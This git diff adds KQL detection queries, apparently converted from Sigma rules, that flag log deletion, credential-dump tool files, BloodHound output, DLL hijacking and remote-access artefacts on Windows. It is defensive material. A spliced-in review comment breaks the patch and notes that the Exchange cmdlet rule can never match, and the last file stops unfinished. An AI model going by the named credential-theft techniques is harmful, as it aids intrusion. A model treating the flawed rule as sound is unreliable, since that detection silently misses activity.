diff --git a/KQL/rules/windows/file/file_delete/eventlog_evtx_file_deleted.kql b/KQL/rules/windows/file/file_delete/eventlog_evtx_file_deleted.kql
new file mode 100644
index 00000000..93c139c6
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/eventlog_evtx_file_deleted.kql
@@ -0,0 +1,10 @@
+// Title: EventLog EVTX File Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+
+DeviceFileEvents
+| where FolderPath endswith ".evtx" and FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/exchange_powershell_cmdlet_history_deleted.kql b/KQL/rules/windows/file/file_delete/exchange_powershell_cmdlet_history_deleted.kql
new file mode 100644
index 00000000..c9c09a88
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/exchange_powershell_cmdlet_history_deleted.kql
@@ -0,0 +1,12 @@
+// Title: Exchange PowerShell Cmdlet History Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-26
+// Level: high
+// Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - Possible FP during log rotation
+
+DeviceFileEvents
+| where FolderPath contains "_Cmdlet_" and FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/file_deleted_via_sysinternals_sdelete.kql b/KQL/rules/windows/file/file_delete/file_deleted_via_sysinternals_sdelete.kql
new file mode 100644
index 00000000..5e684206
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/file_deleted_via_sysinternals_sdelete.kql
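Review bot: In the exchange_powershell_cmdlet_history_deleted query, `FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"` can never be true, because FolderPath in DeviceFileEvents holds a full path that begins with a drive letter or UNC prefix, not a backslash; the conjunction therefore makes this high-level rule dead on arrival. The upstream Sigma pattern is presumably a path fragment meant to be matched anywhere in the path, so `FolderPath contains "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"` restores the intent. It is worth checking whether the conversion applies the same startswith mapping to other rules whose pattern begins with a backslash, since each would be silently inert in the same way.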
@@ -0,0 +1,12 @@
+// Title: File Deleted Via Sysinternals SDelete
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+// - Legitimate usage
+
+DeviceFileEvents
+| where (FolderPath endswith ".AAA" or FolderPath endswith ".ZZZ") and (not(FolderPath endswith "\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/iis_webserver_access_logs_deleted.kql b/KQL/rules/windows/file/file_delete/iis_webserver_access_logs_deleted.kql
new file mode 100644
index 00000000..2f46e888
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/iis_webserver_access_logs_deleted.kql
@@ -0,0 +1,13 @@
+// Title: IIS WebServer Access Logs Deleted
+// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-16
+// Level: medium
+// Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - During uninstallation of the IIS service
+// - During log rotation
+
+DeviceFileEvents
+| where FolderPath contains "\\inetpub\\logs\\LogFiles\\" and FolderPath endswith ".log"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/powershell_console_history_logs_deleted.kql b/KQL/rules/windows/file/file_delete/powershell_console_history_logs_deleted.kql
new file mode 100644
index 00000000..7af11faa
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/powershell_console_history_logs_deleted.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Console History Logs Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+
+DeviceFileEvents
+| where FolderPath endswith "\\PSReadLine\\ConsoleHost_history.txt"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/prefetch_file_deleted.kql b/KQL/rules/windows/file/file_delete/prefetch_file_deleted.kql
new file mode 100644
index 00000000..4cf0c433
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/prefetch_file_deleted.kql
@@ -0,0 +1,10 @@
+// Title: Prefetch File Deleted
+// Author: Cedric MAURUGEON
+// Date: 2021-09-29
+// Level: high
+// Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceFileEvents
+| where (FolderPath contains ":\\Windows\\Prefetch\\" and FolderPath endswith ".pf") and (not((InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" and (RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/teamviewer_log_file_deleted.kql b/KQL/rules/windows/file/file_delete/teamviewer_log_file_deleted.kql
new file mode 100644
index 00000000..aebbe968
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/teamviewer_log_file_deleted.kql
@@ -0,0 +1,10 @@
+// Title: TeamViewer Log File Deleted
+// Author: frack113
+// Date: 2022-01-16
+// Level: low
+// Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceFileEvents
+| where (FolderPath contains "\\TeamViewer_" and FolderPath endswith ".log") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/tomcat_webserver_logs_deleted.kql b/KQL/rules/windows/file/file_delete/tomcat_webserver_logs_deleted.kql
new file mode 100644
index 00000000..f6845c88
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/tomcat_webserver_logs_deleted.kql
@@ -0,0 +1,13 @@
+// Title: Tomcat WebServer Logs Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-16
+// Level: medium
+// Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - During uninstallation of the tomcat server
+// - During log rotation
+
+DeviceFileEvents
+| where (FolderPath contains "catalina." or FolderPath contains "_access_log." or FolderPath contains "localhost.") and (FolderPath contains "\\Tomcat" and FolderPath contains "\\logs\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/unusual_file_deletion_by_dns_exe.kql b/KQL/rules/windows/file/file_delete/unusual_file_deletion_by_dns_exe.kql
new file mode 100644
index 00000000..b3f52523
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/unusual_file_deletion_by_dns_exe.kql
@@ -0,0 +1,10 @@
+// Title: Unusual File Deletion by Dns.exe
+// Author: Tim Rauch (Nextron Systems), Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/_rdp_file_created_by_uncommon_application.kql b/KQL/rules/windows/file/file_event/_rdp_file_created_by_uncommon_application.kql
new file mode 100644
index 00000000..c0db6966
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/_rdp_file_created_by_uncommon_application.kql
@@ -0,0 +1,10 @@
+// Title: .RDP File Created By Uncommon Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-18
+// Level: high
+// Description: Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleaner Browser\\Application\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\Opera.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Whale.exe" or InitiatingProcessFolderPath endswith "\\olk.exe" or InitiatingProcessFolderPath endswith "\\Outlook.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\Thunderbird.exe" or InitiatingProcessFolderPath endswith "\\Discord.exe" or InitiatingProcessFolderPath endswith "\\Keybase.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\Slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and FolderPath endswith ".rdp"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql b/KQL/rules/windows/file/file_event/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql
new file mode 100644
index 00000000..3bf1823b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql
@@ -0,0 +1,12 @@
+// Title: ADExplorer Writing Complete AD Snapshot Into .dat File
+// Author: Arnim Rupp (Nextron Systems), Thomas Patzke
+// Date: 2025-07-09
+// Level: medium
+// Description: Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
+// False Positives:
+// - Legitimate use of ADExplorer by administrators creating .dat snapshots
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\ADExp.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64a.exe") and FolderPath endswith ".dat"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/adsi_cache_file_creation_by_uncommon_tool.kql b/KQL/rules/windows/file/file_event/adsi_cache_file_creation_by_uncommon_tool.kql
new file mode 100644
index 00000000..e58ae69a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/adsi_cache_file_creation_by_uncommon_tool.kql
@@ -0,0 +1,12 @@
+// Title: ADSI-Cache File Creation By Uncommon Tool
+// Author: xknow @xknow_infosec, Tim Shelton
+// Date: 2019-03-24
+// Level: medium
+// Description: Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
+// MITRE Tactic: Command and Control
+// Tags: attack.t1001.003, attack.command-and-control
+// False Positives:
+// - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.
+
+DeviceFileEvents
+| where (FolderPath contains "\\Local\\Microsoft\\Windows\\SchCache\\" and FolderPath endswith ".sch") and (not((((InitiatingProcessFolderPath endswith ":\\Program Files\\Cylance\\Desktop\\CylanceSvc.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\CCM\\CcmExec.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\dllhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\efsui.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\mmc.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wbem\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe") or (InitiatingProcessFolderPath contains ":\\Windows\\ccmsetup\\autoupgrade\\ccmsetup" or InitiatingProcessFolderPath contains ":\\Program Files\\SentinelOne\\Sentinel Agent")) or ((InitiatingProcessFolderPath contains ":\\Program Files\\" and InitiatingProcessFolderPath contains "\\Microsoft Office") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE")))) and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\Citrix\\Receiver StoreFront\\Services\\DefaultDomainServices\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe" or InitiatingProcessFolderPath endswith "\\LANDesk\\LDCLient\\ldapwhoami.exe")))
\ No
newline at end of file
diff --git a/KQL/rules/windows/file/file_event/advanced_ip_scanner_file_event.kql b/KQL/rules/windows/file/file_event/advanced_ip_scanner_file_event.kql
new file mode 100644
index 00000000..c97e2db0
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/advanced_ip_scanner_file_event.kql
@@ -0,0 +1,12 @@
+// Title: Advanced IP Scanner - File Event
+// Author: @ROxPinTeddy
+// Date: 2020-05-12
+// Level: medium
+// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+// - Legitimate administrative use
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\Advanced IP Scanner 2"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/adwind_rat_jrat_file_artifact.kql b/KQL/rules/windows/file/file_event/adwind_rat_jrat_file_artifact.kql
new file mode 100644
index 00000000..251fea5d
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/adwind_rat_jrat_file_artifact.kql
@@ -0,0 +1,10 @@
+// Title: Adwind RAT / JRAT File Artifact
+// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
+// Date: 2017-11-10
+// Level: high
+// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+
+DeviceFileEvents
+| where (FolderPath contains "\\AppData\\Roaming\\Oracle\\bin\\java" and FolderPath contains ".exe") or (FolderPath contains "\\Retrive" and FolderPath contains ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/anydesk_temporary_artefact.kql b/KQL/rules/windows/file/file_event/anydesk_temporary_artefact.kql
new file mode 100644
index 00000000..45ba1b42
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/anydesk_temporary_artefact.kql
@@ -0,0 +1,14 @@
+// Title: Anydesk Temporary Artefact
+// Author: frack113
+// Date: 2022-02-11
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Roaming\\AnyDesk\\user.conf" or FolderPath contains "\\AppData\\Roaming\\AnyDesk\\system.conf"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/assembly_dll_creation_via_aspnetcompiler.kql b/KQL/rules/windows/file/file_event/assembly_dll_creation_via_aspnetcompiler.kql
new file mode 100644
index 00000000..45ac03b2
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/assembly_dll_creation_via_aspnetcompiler.kql
@@ -0,0 +1,12 @@
+// Title: Assembly DLL Creation Via AspNetCompiler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-14
+// Level: medium
+// Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate assembly compilation using a build provider
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" and (FolderPath contains "\\Temporary ASP.NET Files\\" and FolderPath contains "\\assembly\\tmp\\" and FolderPath contains ".dll")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql b/KQL/rules/windows/file/file_event/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql
new file mode 100644
index 00000000..60d24e33
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql
@@ -0,0 +1,12 @@
+// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath endswith "WsmPty.xsl" or FolderPath endswith "WsmTxt.xsl") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/bloodhound_collection_files.kql b/KQL/rules/windows/file/file_event/bloodhound_collection_files.kql
new file mode 100644
index 00000000..d7712fac
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/bloodhound_collection_files.kql
@@ -0,0 +1,12 @@
+// Title: BloodHound Collection Files
+// Author: C.J. May
+// Date: 2022-08-09
+// Level: high
+// Description: Detects default file names outputted by the BloodHound collection tool SharpHound
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
+// False Positives:
+// - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise
+
+DeviceFileEvents
+| where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/created_files_by_microsoft_sync_center.kql b/KQL/rules/windows/file/file_event/created_files_by_microsoft_sync_center.kql
new file mode 100644
index 00000000..49be841b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/created_files_by_microsoft_sync_center.kql
@@ -0,0 +1,10 @@
+// Title: Created Files by Microsoft Sync Center
+// Author: elhoim
+// Date: 2022-04-28
+// Level: medium
+// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/creation_exe_for_service_with_unquoted_path.kql b/KQL/rules/windows/file/file_event/creation_exe_for_service_with_unquoted_path.kql
new file mode 100644
index 00000000..a4d787f2
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/creation_exe_for_service_with_unquoted_path.kql
@@ -0,0 +1,11 @@
+// Title: Creation Exe for Service with Unquoted Path
+// Author: frack113
+// Date: 2021-12-30
+// Level: high
+// Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
+// Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\program.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/creation_of_a_diagcab.kql b/KQL/rules/windows/file/file_event/creation_of_a_diagcab.kql
new file mode 100644
index 00000000..0e0dd198
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/creation_of_a_diagcab.kql
@@ -0,0 +1,12 @@
+// Title: Creation of a Diagcab
+// Author: frack113
+// Date: 2022-06-08
+// Level: medium
+// Description: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development
+// False Positives:
+// - Legitimate microsoft diagcab
+
+DeviceFileEvents
+| where FolderPath endswith ".diagcab"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql b/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql
new file mode 100644
index 00000000..82b26e2b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql
@@ -0,0 +1,12 @@
+// Title: Creation Of Non-Existent System DLL
+// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
+// Date: 2022-12-01
+// Level: medium
+// Description: Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes.
+// Phantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.
+// Thus, the creation of such DLLs may indicate preparation for phantom DLL hijacking attacks.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceFileEvents
+| where FolderPath endswith ":\\Windows\\System32\\axeonoffhelper.dll" or FolderPath endswith ":\\Windows\\System32\\cdpsgshims.dll" or FolderPath endswith ":\\Windows\\System32\\oci.dll" or FolderPath endswith ":\\Windows\\System32\\offdmpsvc.dll" or FolderPath endswith ":\\Windows\\System32\\shellchromeapi.dll" or FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql b/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql
new file mode 100644
index 00000000..783d94c9
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql
@@ -0,0 +1,10 @@
+// Title: Creation of WerFault.exe/Wer.dll in Unusual Folder
+// Author: frack113
+// Date: 2022-05-09
+// Level: medium
+// Description: Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+
+DeviceFileEvents
+| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Windows\\UUS\\arm64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/cred_dump_tools_dropped_files.kql b/KQL/rules/windows/file/file_event/cred_dump_tools_dropped_files.kql
new file mode 100644
index 00000000..5915c1ac
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/cred_dump_tools_dropped_files.kql
@@ -0,0 +1,12 @@
+// Title: Cred Dump Tools Dropped Files
+// Author: Teymur Kheirkhabarov, oscd.community
+// Date: 2019-11-01
+// Level: high
+// Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.003, attack.t1003.004, attack.t1003.005
+// False Positives:
+// - Legitimate Administrator using tool for password recovery
+
+DeviceFileEvents
+| where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procdump64a.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/csexec_service_file_creation.kql b/KQL/rules/windows/file/file_event/csexec_service_file_creation.kql
new file mode 100644
index 00000000..a1b7d6fa
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/csexec_service_file_creation.kql
@@ -0,0 +1,10 @@
+// Title: CSExec Service File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-04
+// Level: medium
+// Description: Detects default CSExec service filename which indicates CSExec service installation and execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+
+DeviceFileEvents
+| where FolderPath endswith "\\csexecsvc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql
new file mode 100644
index 00000000..d4c27717
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql
@@ -0,0 +1,13 @@
+// Title: Desktop.INI Created by Uncommon Process
+// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
+// Date: 2020-03-19
+// Level: medium
+// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
+// False Positives:
+// - Operations performed through Windows SCCM or equivalent
+// - Read only access list authority
+
+DeviceFileEvents
+| where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) and (not(((InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\" and FolderPath contains "\\JetBrains\\apps\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/dll_search_order_hijackig_via_additional_space_in_path.kql b/KQL/rules/windows/file/file_event/dll_search_order_hijackig_via_additional_space_in_path.kql
new file mode 100644
index 00000000..262ff091
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/dll_search_order_hijackig_via_additional_space_in_path.kql
@@ -0,0 +1,11 @@
+// Title: DLL Search Order Hijackig Via Additional Space in Path
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-30
+// Level: high
+// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
+// but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
+
+DeviceFileEvents
